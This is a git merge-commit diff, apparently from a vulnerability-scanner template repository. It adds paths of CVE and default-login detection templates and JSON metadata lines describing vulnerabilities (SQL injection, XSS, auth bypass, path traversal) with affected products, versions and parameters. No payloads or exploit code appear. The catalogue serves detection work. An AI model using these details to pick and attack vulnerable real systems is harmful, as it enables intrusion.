Merge branch 'main' into Salesforce_WebDAV

patch-12
Ibnu Batutah Zarizal 2024-10-22 16:06:25 +07:00 committed by GitHub
commit 8feb79a072
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
241 changed files with 1713 additions and 253 deletions

View File

@ -6,6 +6,18 @@ http/cves/2021/CVE-2021-45811.yaml
http/cves/2023/CVE-2023-1315.yaml
http/cves/2023/CVE-2023-1317.yaml
http/cves/2023/CVE-2023-1318.yaml
http/cves/2023/CVE-2023-2745.yaml
http/cves/2023/CVE-2023-38040.yaml
http/cves/2023/CVE-2023-39560.yaml
http/cves/2023/CVE-2023-40749.yaml
http/cves/2023/CVE-2023-40750.yaml
http/cves/2023/CVE-2023-40751.yaml
http/cves/2023/CVE-2023-40752.yaml
http/cves/2023/CVE-2023-40753.yaml
http/cves/2023/CVE-2023-40755.yaml
http/cves/2023/CVE-2023-43373.yaml
http/cves/2023/CVE-2023-5558.yaml
http/cves/2023/CVE-2023-5561.yaml
http/cves/2024/CVE-2024-32735.yaml
http/cves/2024/CVE-2024-32736.yaml
http/cves/2024/CVE-2024-32737.yaml
@ -15,10 +27,15 @@ http/cves/2024/CVE-2024-3656.yaml
http/cves/2024/CVE-2024-39713.yaml
http/cves/2024/CVE-2024-43360.yaml
http/cves/2024/CVE-2024-44349.yaml
http/cves/2024/CVE-2024-4439.yaml
http/cves/2024/CVE-2024-45488.yaml
http/cves/2024/CVE-2024-46310.yaml
http/cves/2024/CVE-2024-48914.yaml
http/cves/2024/CVE-2024-5910.yaml
http/cves/2024/CVE-2024-8698.yaml
http/cves/2024/CVE-2024-9234.yaml
http/default-logins/apache/doris-default-login.yaml
http/default-logins/sato/sato-default-login.yaml
http/default-logins/zebra/zebra-printer-default-login.yaml
http/exposed-panels/freescout-panel.yaml
http/exposed-panels/paloalto-expedition-panel.yaml
@ -35,6 +52,8 @@ http/technologies/accellion-detect.yaml
http/technologies/mirth-connect-detect.yaml
http/technologies/oracle-fusion-detect.yaml
http/technologies/wordpress/plugins/burst-statistics.yaml
http/vulnerabilities/wordpress/application-pass-xss.yaml
http/vulnerabilities/wordpress/wp-footnote-xss.yaml
http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml
http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml
passive/cves/2024/CVE-2024-40711.yaml

View File

@ -2118,6 +2118,7 @@
{"ID":"CVE-2023-2732","Info":{"Name":"MStore API \u003c= 3.9.2 - Authentication Bypass","Severity":"critical","Description":"The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2732.yaml"}
{"ID":"CVE-2023-27350","Info":{"Name":"PaperCut - Unauthenticated Remote Code Execution","Severity":"critical","Description":"This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27350.yaml"}
{"ID":"CVE-2023-27372","Info":{"Name":"SPIP - Remote Command Execution","Severity":"critical","Description":"SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27372.yaml"}
{"ID":"CVE-2023-2745","Info":{"Name":"WordPress Core \u003c=6.2 - Directory Traversal","Severity":"medium","Description":"WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6.2, via the wp_lang parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2745.yaml"}
{"ID":"CVE-2023-27482","Info":{"Name":"Home Assistant Supervisor - Authentication Bypass","Severity":"critical","Description":"Home Assistant Supervisor is an open source home automation tool. A remotely exploitable vulnerability bypassing authentication for accessing the Supervisor API through Home Assistant has been discovered.This impacts all Home Assistant installation types that use the Supervisor 2023.01.1 or older. Installation types, like Home Assistant Container (for example Docker), or Home Assistant Core manually in a Python environment, are not affected.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-27482.yaml"}
{"ID":"CVE-2023-27524","Info":{"Name":"Apache Superset - Authentication Bypass","Severity":"critical","Description":"Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27524.yaml"}
{"ID":"CVE-2023-27584","Info":{"Name":"Dragonfly2 \u003c 2.1.0-beta.1 - Hardcoded JWT Secret","Severity":"critical","Description":"Dragonfly is an open source P2P-based file distribution and image acceleration system. It is hosted by the Cloud Native Computing Foundation (CNCF) as an Incubating Level Project. Dragonfly uses JWT to verify user. However, the secret key for JWT, \"Secret Key\", is hard coded, which leads to authentication bypass. An attacker can perform any action as a user with admin privileges. This issue has been addressed in release version 2.0.9. All users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27584.yaml"}
@ -2253,6 +2254,7 @@
{"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"}
{"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"}
{"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"}
{"ID":"CVE-2023-38040","Info":{"Name":"Revive Adserver 5.4.1 - Cross-Site Scripting","Severity":"medium","Description":"A reflected XSS vulnerability exists in Revive Adserver 5.4.1 and earlier versions.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38040.yaml"}
{"ID":"CVE-2023-38192","Info":{"Name":"SuperWebMailer 9.00.0.01710 - Cross-Site Scripting","Severity":"medium","Description":"An issue was discovered in SuperWebMailer 9.00.0.01710 allowing XSS via crafted incorrect passwords.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38192.yaml"}
{"ID":"CVE-2023-38194","Info":{"Name":"SuperWebMailer - Cross-Site Scripting","Severity":"medium","Description":"An issue was discovered in SuperWebMailer 9.00.0.01710 that allows keepalive.php XSS via a GET parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38194.yaml"}
{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion - Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"}
@ -2282,6 +2284,7 @@
{"ID":"CVE-2023-39143","Info":{"Name":"PaperCut \u003c 22.1.3 - Path Traversal","Severity":"critical","Description":"PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39143.yaml"}
{"ID":"CVE-2023-3936","Info":{"Name":"Blog2Social \u003c 7.2.1 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3936.yaml"}
{"ID":"CVE-2023-39361","Info":{"Name":"Cacti 1.2.24 - SQL Injection","Severity":"critical","Description":"Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39361.yaml"}
{"ID":"CVE-2023-39560","Info":{"Name":"ECTouch v2 - SQL Injection","Severity":"critical","Description":"ECTouch v2 was discovered to contain a SQL injection vulnerability via the $arr['id'] parameter at \\default\\helpers\\insert.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39560.yaml"}
{"ID":"CVE-2023-39598","Info":{"Name":"IceWarp Email Client - Cross Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39598.yaml"}
{"ID":"CVE-2023-39600","Info":{"Name":"IceWarp 11.4.6.0 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39600.yaml"}
{"ID":"CVE-2023-39650","Info":{"Name":"PrestaShop Theme Volty CMS Blog - SQL Injection","Severity":"critical","Description":"In the module 'Theme Volty CMS Blog' (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39650.yaml"}
@ -2292,6 +2295,12 @@
{"ID":"CVE-2023-40208","Info":{"Name":"Stock Ticker \u003c= 3.23.2 - Cross-Site Scripting","Severity":"medium","Description":"The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40208.yaml"}
{"ID":"CVE-2023-40355","Info":{"Name":"Axigen WebMail - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-40355.yaml"}
{"ID":"CVE-2023-40504","Info":{"Name":"LG Simple Editor \u003c= v3.21.0 - Command Injection","Severity":"critical","Description":"LG Simple Editor readVideoInfo Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of LG Simple Editor. Authentication is not required to exploit this vulnerability. The specific flaw exists within the readVideoInfo method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-40504.yaml"}
{"ID":"CVE-2023-40749","Info":{"Name":"PHPJabbers Food Delivery Script v3.0 - SQL Injection","Severity":"critical","Description":"PHPJabbers Food Delivery Script v3.0 is vulnerable to SQL Injection in the \"column\" parameter of index.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-40749.yaml"}
{"ID":"CVE-2023-40750","Info":{"Name":"PHPJabbers Yacht Listing Script v1.0 - Cross-Site Scripting","Severity":"medium","Description":"There is a Cross Site Scripting (XSS) vulnerability in the \"action\" parameter of index.php in PHPJabbers Yacht Listing Script v1.0.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40750.yaml"}
{"ID":"CVE-2023-40751","Info":{"Name":"PHPJabbers Fundraising Script v1.0 - Cross-Site Scripting","Severity":"medium","Description":"PHPJabbers Fundraising Script v1.0 is vulnerable to Cross Site Scripting (XSS) via the \"action\" parameter of index.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40751.yaml"}
{"ID":"CVE-2023-40752","Info":{"Name":"PHPJabbers Make an Offer Widget v1.0 - Cross-Site Scripting","Severity":"medium","Description":"There is a Cross Site Scripting (XSS) vulnerability in the \"action\" parameter of index.php in PHPJabbers Make an Offer Widget v1.0.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40752.yaml"}
{"ID":"CVE-2023-40753","Info":{"Name":"PHPJabbers Ticket Support Script v3.2 - Cross-Site Scripting","Severity":"medium","Description":"There is a Cross Site Scripting (XSS) vulnerability in the message parameter of index.php in PHPJabbers Ticket Support Script v3.2.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-40753.yaml"}
{"ID":"CVE-2023-40755","Info":{"Name":"PHPJabbers Callback Widget v1.0 - Cross-Site Scripting","Severity":"medium","Description":"There is a Cross Site Scripting (XSS) vulnerability in the \"theme\" parameter of preview.php in PHPJabbers Callback Widget v1.0.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40755.yaml"}
{"ID":"CVE-2023-40779","Info":{"Name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","Severity":"medium","Description":"An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40779.yaml"}
{"ID":"CVE-2023-4110","Info":{"Name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4110.yaml"}
{"ID":"CVE-2023-41109","Info":{"Name":"SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway - Command Injection","Severity":"critical","Description":"The SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway is vulnerable to command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41109.yaml"}
@ -2328,6 +2337,7 @@
{"ID":"CVE-2023-43323","Info":{"Name":"mooSocial 3.1.8 - External Service Interaction","Severity":"medium","Description":"mooSocial 3.1.8 is vulnerable to external service interaction via multiple parameters in the post function.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-43323.yaml"}
{"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"}
{"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"}
{"ID":"CVE-2023-43373","Info":{"Name":"Hoteldruid v3.0.5 - SQL Injection","Severity":"critical","Description":"Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the n_utente_agg parameter at /hoteldruid/interconnessioni.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43373.yaml"}
{"ID":"CVE-2023-43374","Info":{"Name":"Hoteldruid v3.0.5 - SQL Injection","Severity":"critical","Description":"Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43374.yaml"}
{"ID":"CVE-2023-43472","Info":{"Name":"MLFlow \u003c 2.8.1 - Sensitive Information Disclosure","Severity":"high","Description":"An issue in MLFlow versions 2.8.1 and before allows a remote attacker to obtain sensitive information via a crafted request to REST API.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43472.yaml"}
{"ID":"CVE-2023-43654","Info":{"Name":"PyTorch TorchServe SSRF","Severity":"critical","Description":"TorchServe is a tool for serving and scaling PyTorch models in production. TorchServe default configuration lacks proper input validation, enabling third parties to invoke remote HTTP download requests and write files to the disk. This issue could be taken advantage of to compromise the integrity of the system and sensitive data. This issue is present in versions 0.1.0 to 0.8.1. A user is able to load the model of their choice from any URL that they would like to use. The user of TorchServe is responsible for configuring both the allowed_urls and specifying the model URL to be used. A pull request to warn the user when the default value for allowed_urls is used has been merged in PR #2534. TorchServe release 0.8.2 includes this change. Users are advised to upgrade. There are no known workarounds for this issue.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43654.yaml"}
@ -2399,6 +2409,8 @@
{"ID":"CVE-2023-5360","Info":{"Name":"WordPress Royal Elementor Addons Plugin \u003c= 1.3.78 - Arbitrary File Upload","Severity":"critical","Description":"Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5360.yaml"}
{"ID":"CVE-2023-5375","Info":{"Name":"Mosparo \u003c 1.0.2 - Open Redirect","Severity":"medium","Description":"Open Redirect in GitHub repository mosparo/mosparo prior to 1.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5375.yaml"}
{"ID":"CVE-2023-5556","Info":{"Name":"Structurizr on-premises - Cross Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5556.yaml"}
{"ID":"CVE-2023-5558","Info":{"Name":"LearnPress \u003c 4.2.5.5 - Cross-Site Scripting","Severity":"medium","Description":"The LearnPress WordPress plugin before 4.2.5.5 does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5558.yaml"}
{"ID":"CVE-2023-5561","Info":{"Name":"WordPress Core - Post Author Email Disclosure","Severity":"medium","Description":"WordPress Core is vulnerable to Sensitive Information Exposure in versions between 4.7.0 and 6.3.1 via the User REST endpoint. While the search results do not display user email addresses unless the requesting user has the 'list_users' capability, the search is applied to the user_email column.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-5561.yaml"}
{"ID":"CVE-2023-5830","Info":{"Name":"ColumbiaSoft DocumentLocator - Improper Authentication","Severity":"critical","Description":"Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5830.yaml"}
{"ID":"CVE-2023-5863","Info":{"Name":"phpMyFAQ \u003c 3.2.0 - Cross-site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) Reflected in GitHub repository thorsten/phpmyfaq prior to 3.2.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5863.yaml"}
{"ID":"CVE-2023-5914","Info":{"Name":"Citrix StoreFront - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting issue which is exploitable without authentication. This vulnerability was exploitable through coercing an error message during an XML parsing procedure in the SSO flow.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5914.yaml"}
@ -2610,6 +2622,7 @@
{"ID":"CVE-2024-44000","Info":{"Name":"LiteSpeed Cache \u003c= 6.4.1 - Sensitive Information Exposure","Severity":"high","Description":"The LiteSpeed Cache plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.4.1 through the debug.log file that is publicly exposed. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log file. The log file may contain user cookies making it possible for an attacker to log in with any session that is actively valid and exposed in the log file. Note: the debug feature must be enabled for this to be a concern and this feature is disabled by default.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-44000.yaml"}
{"ID":"CVE-2024-4434","Info":{"Name":"LearnPress WordPress LMS Plugin \u003c= 4.2.6.5 - SQL Injection","Severity":"critical","Description":"The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the term_id parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4434.yaml"}
{"ID":"CVE-2024-44349","Info":{"Name":"AnteeoWMS \u003c v4.7.34 - SQL Injection","Severity":"critical","Description":"A SQL injection vulnerability in login portal in AnteeoWMS before v4.7.34 allows unauthenticated attackers to execute arbitrary SQL commands via the username parameter and disclosure of some data in the underlying DB.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-44349.yaml"}
{"ID":"CVE-2024-4439","Info":{"Name":"WordPress Core \u003c6.5.2 - Cross-Site Scripting","Severity":"high","Description":"WordPress Core is vulnerable to Stored Cross-Site Scripting via user display names in the Avatar block in various versions up to 6.5.2 due to insufficient output escaping on the display name.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2024/CVE-2024-4439.yaml"}
{"ID":"CVE-2024-4443","Info":{"Name":"Business Directory Plugin \u003c= 6.4.2 - SQL Injection","Severity":"critical","Description":"The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the listingfields parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4443.yaml"}
{"ID":"CVE-2024-44849","Info":{"Name":"Qualitor \u003c= 8.24 - Remote Code Execution","Severity":"critical","Description":"Qualitor up to 8.24 is vulnerable to Remote Code Execution (RCE) via Arbitrary File Upload in checkAcesso.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-44849.yaml"}
{"ID":"CVE-2024-45195","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"high","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45195.yaml"}
@ -2627,6 +2640,7 @@
{"ID":"CVE-2024-4836","Info":{"Name":"Edito CMS - Sensitive Data Leak","Severity":"high","Description":"Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4836.yaml"}
{"ID":"CVE-2024-4879","Info":{"Name":"ServiceNow UI Macros - Template Injection","Severity":"unknown","Description":"ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4879.yaml"}
{"ID":"CVE-2024-4885","Info":{"Name":"Progress Software WhatsUp Gold GetFileWithoutZip Directory Traversal - Remote Code Execution","Severity":"critical","Description":"This vulnerability allows remote attackers to execute arbitrary code on affected installations of Progress Software WhatsUp Gold. Authentication is not required to exploit this vulnerability.\nThe specific flaw exists within the implementation of GetFileWithoutZip method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the service account.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4885.yaml"}
{"ID":"CVE-2024-48914","Info":{"Name":"Vendure - Arbitrary File Read","Severity":"critical","Description":"Vendure is an open-source headless commerce platform. Prior to versions 3.0.5 and 2.3.3, a vulnerability in Vendure's asset server plugin allows an attacker to craft a request which is able to traverse the server file system and retrieve the contents of arbitrary files, including sensitive data such as configuration files, environment variables, and other critical data stored on the server. In the same code path is an additional vector for crashing the server via a malformed URI.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-48914.yaml"}
{"ID":"CVE-2024-4940","Info":{"Name":"Gradio - Open Redirect","Severity":"medium","Description":"An open redirect vulnerability exists in the gradio-app/gradio, affecting the latest version. The vulnerability allows an attacker to redirect users to arbitrary websites, which can be exploited for phishing attacks, Cross-site Scripting (XSS), Server-Side Request Forgery (SSRF), amongst others. This issue is due to improper validation of user-supplied input in the handling of URLs. Attackers can exploit this vulnerability by crafting a malicious URL that, when processed by the application, redirects the user to an attacker-controlled web page.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2024/CVE-2024-4940.yaml"}
{"ID":"CVE-2024-4956","Info":{"Name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","Severity":"high","Description":"Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-4956.yaml"}
{"ID":"CVE-2024-5084","Info":{"Name":"Hash Form \u003c= 1.1.0 - Arbitrary File Upload","Severity":"critical","Description":"The Hash Form Drag \u0026 Drop Form Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'file_upload_action' function in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5084.yaml"}
@ -2695,6 +2709,7 @@
{"ID":"CVE-2024-8877","Info":{"Name":"Riello Netman 204 - SQL Injection","Severity":"critical","Description":"The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8877.yaml"}
{"ID":"CVE-2024-8883","Info":{"Name":"Keycloak - Open Redirect","Severity":"medium","Description":"A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2024/CVE-2024-8883.yaml"}
{"ID":"CVE-2024-9014","Info":{"Name":"pgAdmin 4 - Authentication Bypass","Severity":"critical","Description":"pgAdmin 4 versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-9014.yaml"}
